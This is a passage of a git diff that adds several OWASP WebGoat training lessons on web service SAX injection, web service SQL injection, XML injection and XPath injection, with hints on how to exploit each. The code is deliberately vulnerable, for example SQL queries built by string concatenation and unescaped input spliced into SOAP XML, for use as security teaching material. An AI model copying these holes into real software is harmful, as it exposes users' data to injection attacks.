+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.PRE;
+
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.util.HtmlEncoder;
+import org.xml.sax.Attributes;
+import org.xml.sax.InputSource;
+import org.xml.sax.SAXException;
+import org.xml.sax.XMLReader;
+import org.xml.sax.helpers.DefaultHandler;
+import org.xml.sax.helpers.XMLReaderFactory;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author rdawes
+ * 
+ * TODO To change the template for this generated type comment go to Window -
+ * Preferences - Java - Code Style - Code Templates
+ */
+public class WsSAXInjection extends LessonAdapter
+{
+
+    private final static String PASSWORD = "password";
+
+    private String password;
+
+    private static String template1 = "<?xml version='1.0' encoding='UTF-8'?>\n"
+	    + "<wsns0:Envelope\n"
+	    + "  xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'\n"
+	    + "  xmlns:xsd='http://www.w3.org/2001/XMLSchema'\n"
+	    + "  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'\n"
+	    + "  xmlns:wsns1='http://lessons.webgoat.owasp.org'>\n"
+	    + "  <wsns0:Body>\n"
+	    + "    <wsns1:changePassword>\n"
+	    + "      <id xsi:type='xsd:int'>101</id>\n"
+	    + "      <password xsi:type='xsd:string'>";
+
+    private static String template2 = "</password>\n"
+	    + "    </wsns1:changePassword>\n" + "  </wsns0:Body>\n"
+	    + "</wsns0:Envelope>";
+
+    static boolean completed;
+
+
+    protected Category getDefaultCategory()
+    {
+	return Category.WEB_SERVICES;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+
+	hints.add("The backend parses the XML received using a SAX parser.");
+	hints.add("SAX parsers often don't care if an element is repeated.");
+	hints
+		.add("If there are repeated elements, the last one is the one that is effective");
+	hints
+		.add("Try injecting matching 'close' tags, and creating your own XML elements");
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(150);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    public String getTitle()
+    {
+	return "Web Service SAX Injection";
+    }
+
+
+    protected Element makeInputLine(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec.addElement(new P().addElement("Please change your password: "));
+
+	Input input = new Input(Input.TEXT, PASSWORD);
+	ec.addElement(input);
+
+	Element b = ECSFactory.makeButton("Go!");
+	ec.addElement(b);
+
+	return ec;
+    }
+
+
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	try
+	{
+	    ec.addElement(makeInputLine(s));
+
+	    password = s.getParser().getRawParameter(PASSWORD, null);
+
+	    PRE pre = new PRE();
+	    String xml = template1;
+	    xml = xml + (password == null ? "[password]" : password);
+	    xml = xml + template2;
+	    pre.addElement(HtmlEncoder.encode(xml));
+	    ec.addElement(pre);
+
+	    if (password != null)
+	    {
+		ec.addElement(checkXML(s, xml));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return (ec);
+    }
+
+
+    private Element checkXML(WebSession s, String xml)
+    {
+	try
+	{
+	    XMLReader reader = XMLReaderFactory.createXMLReader();
+	    PasswordChanger changer = new PasswordChanger();
+	    reader.setContentHandler(changer);
+	    reader.parse(new InputSource(new StringReader(xml)));
+	    if (!"101".equals(changer.getId()))
+	    {
+		makeSuccess(s);
+		return new B(HtmlEncoder
+			.encode("You have changed the passsword for userid "
+				+ changer.getId() + " to '"
+				+ changer.getPassword() + "'"));
+	    }
+	    else
+	    {
+		return new StringElement(
+			"You changed the password for userid 101. Try again.");
+	    }
+	}
+	catch (SAXException saxe)
+	{
+	    return new StringElement("The XML was not well formed: "
+		    + saxe.getLocalizedMessage());
+	}
+	catch (IOException ioe)
+	{
+	    return new StringElement(ioe.getLocalizedMessage());
+	}
+    }
+
+    private static class PasswordChanger extends DefaultHandler
+    {
+
+	private static String PASSWORD_TAG = "password";
+
+	private static String ID_TAG = "id";
+
+	private String id = null;
+
+	private String password = null;
+
+	private StringBuffer text = new StringBuffer();
+
+
+	public void startElement(String uri, String localName, String qName,
+		Attributes atts) throws SAXException
+	{
+	    text.delete(0, text.length());
+	}
+
+
+	public void characters(char[] ch, int start, int length)
+		throws SAXException
+	{
+	    text.append(ch, start, length);
+	}
+
+
+	public void endElement(String uri, String localName, String qName)
+		throws SAXException
+	{
+	    if (localName.equals(ID_TAG))
+		id = text.toString();
+	    if (localName.equals(PASSWORD_TAG))
+		password = text.toString();
+	    text.delete(0, text.length());
+	}
+
+
+	public void ignorableWhitespace(char[] ch, int start, int length)
+		throws SAXException
+	{
+	    text.append(ch, start, length);
+	}
+
+
+	public String getId()
+	{
+	    return id;
+	}
+
+
+	public String getPassword()
+	{
+	    return password;
+	}
+
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java
new file mode 100644
index 000000000..0bcbbd19f
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java
@@ -0,0 +1,294 @@
+/*
+ * Created on Jun 1, 2005
+ *
+ * TODO To change the template for this generated file go to
+ * Window - Preferences - Java - Code Style - Code Templates
+ */
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.ResultSetMetaData;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.html.A;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.PRE;
+
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.session.WebgoatContext;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author asmolen
+ *
+ * TODO To change the template for this generated type comment go to
+ * Window - Preferences - Java - Code Style - Code Templates
+ */
+public class WsSqlInjection extends LessonAdapter
+{
+
+    public final static String ccNumber = "cc_number";
+
+    private final static String ACCT_NUM = "account_number";
+
+    private String accountNumber;
+
+    final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg")
+	    .setAlt("Parasoft").setBorder(0).setHspace(0).setVspace(0);
+
+    /* (non-Javadoc)
+     * @see lessons.AbstractLesson#getMenuItem()
+     */
+    static boolean completed;
+
+	private static WebgoatContext webgoatContext;
+	
+	/**
+	 * We maintain a static reference to WebgoatContext, since this class
+	 * is also automatically instantiated by the Axis web services module,
+	 * which does not call setWebgoatContext()
+	 * (non-Javadoc)
+	 * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext)
+	 */
+	@Override
+	public void setWebgoatContext(WebgoatContext webgoatContext) {
+		WsSqlInjection.webgoatContext = webgoatContext;
+	}
+	
+	@Override
+	public WebgoatContext getWebgoatContext() {
+		return WsSqlInjection.webgoatContext;
+	}
+
+
+    protected Category getDefaultCategory()
+    {
+	return Category.WEB_SERVICES;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	hints
+		.add("Try connecting to the WSDL with a browser or Web Service tool.");
+	hints
+		.add("Sometimes the server side code will perform input validation before issuing  "
+			+ "the request to the web service operation.  Try to bypass this check by "
+			+ "accessing the web service directly");
+	hints
+		.add("The URL for the web service is: http://localhost/WebGoat/services/WsSqlInjection?WSDL <br>"
+			+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
+	hints
+		.add("Create a new soap request for the getCreditCard(String id) operation.");
+	hints
+		.add("A soap request uses the following HTTP header: <br> "
+			+ "SOAPAction: some action header, can be &quot;&quot;<br><br>"
+			+ "The soap message body has the following format:<br>"
+			+ "&lt;?xml version='1.0' encoding='UTF-8'?&gt; <br>"
+			+ "&nbsp;&nbsp;&lt;SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'&gt; <br>"
+			+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;SOAP-ENV:Body&gt; <br>"
+			+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;ns1:getCreditCard SOAP-ENV:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:ns1='http://lessons'&gt; <br>"
+			+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;id xsi:type='xsd:string'&gt;101&lt;/id&gt; <br>"
+			+ "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/ns1:getCreditCard&gt; <br>"
+			+ "&nbsp;&nbsp;&nbsp;&nbsp;&lt;/SOAP-ENV:Body&gt; <br>"
+			+ "&nbsp;&nbsp;&lt;/SOAP-ENV:Envelope&gt; <br>" + "");
+	/*		"&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt; <br>" +
+	 "  &lt;SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" <br>" +
+	 "	                  xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" <br>" +
+	 "	                  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"&gt; <br>" +
+	 "     &lt;SOAP-ENV:Body&gt; <br>" +
+	 "		  &lt;ns1:getCreditCard SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\"&gt; <br>" +
+	 "		   &lt;id xsi:type=\"xsd:string\"&gt;101&lt;/id&gt; <br>"+
+	 "		  &lt;/ns1:getCreditCard&gt; <br>" +
+	 "     &lt;/SOAP-ENV:Body&gt; <br>" +
+	 "  &lt;/SOAP-ENV:Envelope&gt; <br><br>" +
+	 "Intercept the HTTP request and try to create a soap request.");	*/
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(150);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    public String getTitle()
+    {
+	return "Web Service SQL Injection";
+    }
+
+
+    protected Element makeAccountLine(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	ec.addElement(new P().addElement("Enter your Account Number: "));
+
+	accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
+	Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
+	ec.addElement(input);
+
+	Element b = ECSFactory.makeButton("Go!");
+	ec.addElement(b);
+
+	return ec;
+    }
+
+
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	try
+	{
+	    ec.addElement(makeAccountLine(s));
+
+	    String query = "SELECT * FROM user_data WHERE userid = "
+		    + accountNumber;
+	    ec.addElement(new PRE(query));
+	    for (int i = 0; i < accountNumber.length(); i++)
+	    {
+		char c = accountNumber.charAt(i);
+		if (c < '0' || c > '9')
+		{
+		    ec.addElement("Invalid account number. ");
+		    accountNumber = "0";
+		}
+	    }
+	    try
+	    {
+		ResultSet results = getResults(accountNumber);
+		if ((results != null) && (results.first() == true))
+		{
+		    ResultSetMetaData resultsMetaData = results.getMetaData();
+		    ec.addElement(DatabaseUtilities.writeTable(results,
+			    resultsMetaData));
+		    results.last();
+		    if (results.getRow() >= 6)
+		    {
+			//this should never happen
+		    }
+		}
+		else
+		{
+		    ec.addElement("No results matched.  Try Again.");
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		ec.addElement(new P().addElement(sqle.getMessage()));
+	    }
+	    A a = new A("services/WsSqlInjection?WSDL", "WebGoat WSDL File");
+	    ec
+		    .addElement(new P()
+			    .addElement("Exploit the following WSDL to access sensitive data:"));
+	    ec.addElement(new BR());
+	    ec.addElement(a);
+	    getLessonTracker(s).setCompleted(completed);
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+	return (ec);
+    }
+
+
+    public ResultSet getResults(String id)
+    {
+	try
+	{
+	    Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
+	    String query = "SELECT * FROM user_data WHERE userid = " + id;
+	    try
+	    {
+		Statement statement = connection.createStatement(
+			ResultSet.TYPE_SCROLL_INSENSITIVE,
+			ResultSet.CONCUR_READ_ONLY);
+		ResultSet results = statement.executeQuery(query);
+		return results;
+	    }
+	    catch (SQLException sqle)
+	    {}
+	}
+	catch (Exception e)
+	{}
+	return null;
+    }
+
+
+    public String[] getCreditCard(String id)
+    {
+	ResultSet results = getResults(id);
+	if ((results != null))
+	{
+	    try
+	    {
+		results.last();
+		String[] users = new String[results.getRow()];
+		if (users.length > 4)
+		{
+		    completed = true;
+		}
+		results.beforeFirst();
+		while (results.next() == true)
+		{
+		    int i = results.getRow();
+		    users[i - 1] = results.getString(ccNumber);
+		}
+		return users;
+	    }
+	    catch (SQLException sqle)
+	    {}
+	}
+	return null;
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java
new file mode 100644
index 000000000..726365dc1
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java
@@ -0,0 +1,387 @@
+package org.owasp.webgoat.lessons;
+
+import java.io.PrintWriter;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Div;
+import org.apache.ecs.html.Form;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.H3;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ */
+public class XMLInjection extends LessonAdapter
+{
+
+    private final static Integer DEFAULT_RANKING = new Integer(20);
+
+    private final static String ACCOUNTID = "accountID";
+
+    public static HashMap<Integer, Reward> rewardsMap = new HashMap<Integer, Reward>();
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    protected static HashMap<Integer, Reward> init()
+    {
+	Reward r = new Reward();
+
+	r.setName("WebGoat t-shirt");
+	r.setPoints(50);
+	rewardsMap.put(1001, r);
+
+	r = new Reward();
+	r.setName("WebGoat Secure Kettle");
+	r.setPoints(30);
+	rewardsMap.put(1002, r);
+
+	r = new Reward();
+	r.setName("WebGoat Mug");
+	r.setPoints(20);
+	rewardsMap.put(1003, r);
+
+	r = new Reward();
+	r.setName("WebGoat Core Duo Laptop");
+	r.setPoints(2000);
+	rewardsMap.put(1004, r);
+
+	r = new Reward();
+	r.setName("WebGoat Hawaii Cruise");
+	r.setPoints(3000);
+	rewardsMap.put(1005, r);
+
+	return rewardsMap;
+    }
+
+
+    public void handleRequest(WebSession s)
+    {
+
+	try
+	{
+	    if (s.getParser().getRawParameter("from", "").equals("ajax"))
+	    {
+		if (s.getParser().getRawParameter(ACCOUNTID, "").equals(
+			"836239"))
+		{
+		    String lineSep = System.getProperty("line.separator");
+		    String xmlStr = "<root>" + lineSep
+			    + "<reward>WebGoat Mug 20 Pts</reward>"
+			    + lineSep
+			    + "<reward>WebGoat t-shirt 50 Pts</reward>"
+			    + lineSep + "<reward>WebGoat Secure Kettle 30 Pts</reward>"
+			    + lineSep + "</root>";
+		    s.getResponse().setContentType("text/xml");
+		    s.getResponse().setHeader("Cache-Control", "no-cache");
+		    PrintWriter out = new PrintWriter(s.getResponse()
+			    .getOutputStream());
+		    out.print(xmlStr);
+		    out.flush();
+		    out.close();
+		    return;
+		}
+	    }
+	}
+	catch (Exception ex)
+	{
+	    ex.printStackTrace();
+	}
+
+	Form form = new Form(getFormAction(), Form.POST).setName("form")
+		.setEncType("");
+
+	form.addElement(createContent(s));
+
+	setContent(form);
+
+    }
+
+
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+	boolean isDone = false;
+	init();
+
+	if (s.getParser().getRawParameter("done", "").equals("yes"))
+	{
+	    isDone = true;
+	}
+	String lineSep = System.getProperty("line.separator");
+	String script = "<script>"
+		+ lineSep
+		+ "function getRewards() {"
+		+ lineSep
+		+ "var accountIDField = document.getElementById('"
+		+ ACCOUNTID
+		+ "');"
+		+ lineSep
+		+ "if (accountIDField.value.length < 6 ) { return; }"
+		+ lineSep
+		+ "var url = '" + getLink()
+		+ "&from=ajax&"
+		+ ACCOUNTID
+		+ "=' + encodeURIComponent(accountIDField.value);"
+		+ lineSep
+		+ "if (typeof XMLHttpRequest != 'undefined') {"
+		+ lineSep
+		+ "req = new XMLHttpRequest();"
+		+ lineSep
+		+ "} else if (window.ActiveXObject) {"
+		+ lineSep
+		+ "req = new ActiveXObject('Microsoft.XMLHTTP');"
+		+ lineSep
+		+ "   }"
+		+ lineSep
+		+ "   req.open('GET', url, true);"
+		+ lineSep
+		+ "   req.onreadystatechange = callback;"
+		+ lineSep
+		+ "   req.send(null);"
+		+ lineSep
+		+ "}"
+		+ lineSep
+		+ "function callback() {"
+		+ lineSep
+		+ "    if (req.readyState == 4) { "
+		+ lineSep
+		+ "        if (req.status == 200) { "
+		+ lineSep
+		+ "            var rewards = req.responseXML.getElementsByTagName('reward');"
+		+ lineSep
+		+ "			 var rewardsDiv = document.getElementById('rewardsDiv');"
+		+ lineSep
+		+ "				rewardsDiv.innerHTML = '';"
+		+ lineSep
+		+ "				var strHTML='';"
+		+ lineSep
+		+ "				strHTML = '<tr><td>&nbsp;</td><td><b>Rewards</b></td></tr>';"
+		+ lineSep
+		+ "			 for(var i=0; i< rewards.length; i++){"
+		//+ lineSep
+		//+ "				var node = rewards.childNodes[i+1];"
+		+ lineSep
+		+ "				strHTML = strHTML + '<tr><td><input name=\"check' + (i+1001) +'\" type=\"checkbox\"></td><td>';"
+		+ lineSep
+		+ "			    strHTML = strHTML + rewards[i].firstChild.nodeValue + '</td></tr>';"
+		+ lineSep
+		+ "			 }"
+		+ lineSep
+		+ "				strHTML = '<table>' + strHTML + '</table>';"
+		+ lineSep
+		+ "				strHTML = 'Your account balance is now 100 points<br><br>' + strHTML;"
+		+ lineSep + "               rewardsDiv.innerHTML = strHTML;"
+		+ lineSep + "        }}}" + lineSep + "</script>" + lineSep;
+
+	if (!isDone)
+	{
+	    ec.addElement(new StringElement(script));
+	}
+	ec.addElement(new BR().addElement(new H1()
+		.addElement("Welcome to WebGoat-Miles Reward Miles Program.")));
+	ec.addElement(new BR());
+
+	ec.addElement(new BR().addElement(new H3()
+		.addElement("Rewards available through the program:")));
+	ec.addElement(new BR());
+	Table t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
+		.setWidth("90%").setAlign("center");
+	TR trRewards = null;
+
+	for (int i = 1001; i < 1001 + rewardsMap.size(); i++)
+	{
+	    trRewards = new TR();
+	    Reward r = (Reward) rewardsMap.get(i);
+	    trRewards.addElement(new TD("-" + r.getName()));
+	    trRewards.addElement(new TD(r.getPoints() + " Pts"));
+	    t2.addElement(trRewards);
+	}
+
+	ec.addElement(t2);
+
+	ec.addElement(new BR());
+
+	ec.addElement(new H3().addElement("Redeem your points:"));
+	ec.addElement(new BR());
+
+	Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0)
+		.setWidth("90%").setAlign("center");
+
+	TR tr = new TR();
+
+	tr.addElement(new TD("Please enter your account ID:"));
+
+	Input input1 = new Input(Input.TEXT, ACCOUNTID, "");
+	input1.addAttribute("onkeyup", "getRewards();");
+	input1.addAttribute("id", ACCOUNTID);
+	tr.addElement(new TD(input1));
+	t1.addElement(tr);
+
+	ec.addElement(t1);
+	ec.addElement(new BR());
+	ec.addElement(new BR());
+	ec.addElement(new BR());
+
+	Div div = new Div();
+	div.addAttribute("name", "rewardsDiv");
+	div.addAttribute("id", "rewardsDiv");
+	ec.addElement(div);
+
+	Input b = new Input();
+	b.setType(Input.SUBMIT);
+	b.setValue("Submit");
+	b.setName("SUBMIT");
+	ec.addElement(b);
+
+	if (s.getParser().getRawParameter("SUBMIT", "") != "")
+	{
+	    if (s.getParser().getRawParameter("check1004", "") != "")
+	    {
+		makeSuccess(s);
+	    }
+	    else
+	    {
+		StringBuffer shipment = new StringBuffer();
+		for (int i = 1001; i < 1001 + rewardsMap.size(); i++)
+		{
+
+		    if (s.getParser().getRawParameter("check" + i, "") != "")
+		    {
+			shipment.append(((Reward) rewardsMap.get(i)).getName()
+				+ "<br>");
+		    }
+		}
+		shipment
+			.insert(0,
+				"<br><br><b>The following items will be shipped to your address:</b><br>");
+		ec.addElement(new StringElement(shipment.toString()));
+	    }
+
+	}
+
+	return ec;
+    }
+
+
+    protected Element makeSuccess(WebSession s)
+    {
+	getLessonTracker(s).setCompleted(true);
+
+	s
+		.setMessage("Congratulations. You have successfully completed this lesson.");
+
+	return (null);
+    }
+
+
+    public Element getCredits()
+    {
+	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+    }
+
+
+    protected Category getDefaultCategory()
+    {
+
+	return Category.AJAX_SECURITY;
+    }
+
+
+    protected Integer getDefaultRanking()
+    {
+
+	return DEFAULT_RANKING;
+    }
+
+
+    protected List<String> getHints(WebSession s)
+    {
+
+	List<String> hints = new ArrayList<String>();
+	hints.add("This page is using XMLHTTP to comunicate with the server.");
+	hints.add("Try to intercept the reply and check the reply.");
+	hints
+		.add("Intercept the reply and try to inject some XML to add more rewards to yourself.");
+	return hints;
+    }
+
+
+    public String getTitle()
+    {
+	return "XML Injection";
+    }
+
+    static class Reward
+    {
+
+	private String name;
+
+	private int points;
+
+
+	public String getName()
+	{
+	    return name;
+	}
+
+
+	public void setName(String name)
+	{
+	    this.name = name;
+	}
+
+
+	public int getPoints()
+	{
+	    return points;
+	}
+
+
+	public void setPoints(int points)
+	{
+	    this.points = points;
+	}
+
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java
new file mode 100644
index 000000000..ba98ab3d3
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java
@@ -0,0 +1,265 @@
+/**
+ * 
+ */
+package org.owasp.webgoat.lessons;
+
+import java.io.File;
+import java.util.ArrayList;
+import java.util.List;
+import java.io.IOException;
+import java.io.FileInputStream;
+import org.xml.sax.InputSource;
+import org.w3c.dom.NodeList;
+import org.w3c.dom.Node;
+
+import javax.xml.xpath.XPathConstants;
+import javax.xml.xpath.XPath;
+import javax.xml.xpath.XPathFactory;
+import javax.xml.xpath.XPathExpressionException;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.Table;
+import org.apache.ecs.html.H1;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.B;
+import org.apache.ecs.html.PRE;
+import org.apache.ecs.HtmlColor;
+
+import org.owasp.webgoat.session.WebSession;
+import org.owasp.webgoat.session.ECSFactory;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created    November 28, 2006
+ */
+
+public class XPATHInjection extends LessonAdapter
+{
+
+    private final static Integer DEFAULT_RANKING = new Integer(74);
+
+    private final static String USERNAME = "Username";
+
+    private final static String PASSWORD = "Password";
+
+    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+    protected Element createContent(WebSession s)
+    {
+
+	NodeList nodes = null;
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    ec.addElement(new BR().addElement(new H1()
+		    .addElement("Welcome to WebGoat employee intranet")));
+	    ec.addElement(new BR());
+	    Table t1 = new Table().setCellSpacing(0).setCellPadding(0)
+		    .setBorder(0).setWidth("90%").setAlign("center");
+
+	    TR tr = new TR();
+	    tr
+		    .addElement(new TH()
+			    .addElement(
+				    "Please confirm your username and password before viewing your profile.")
+			    .setColSpan(2).setAlign("left"));
+	    t1.addElement(tr);
+
+	    tr = new TR();
+	    tr.addElement(new TD().addElement("*Required Fields").setWidth(
+		    "30%").setColSpan(2).setAlign("left"));
+	    t1.addElement(tr);
+
+	    tr = new TR();
+	    tr.addElement(new TD().addElement("&nbsp").setWidth("30%")
+		    .setColSpan(2).setAlign("left"));
+	    t1.addElement(tr);
+
+	    tr = new TR();
+	    tr.addElement(new TD(new B(new StringElement("*User Name: "))));
+
+	    Input input1 = new Input(Input.TEXT, USERNAME, "");
+	    tr.addElement(new TD(input1));
+	    t1.addElement(tr);
+
+	    tr = new TR();
+	    tr.addElement(new TD(new B(new StringElement("*Password: "))));
+
+	    Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+	    tr.addElement(new TD(input2));
+	    t1.addElement(tr);
+
+	    Element b = ECSFactory.makeButton("Submit");
+	    t1.addElement(new TR(new TD(b)));
+	    ec.addElement(t1);
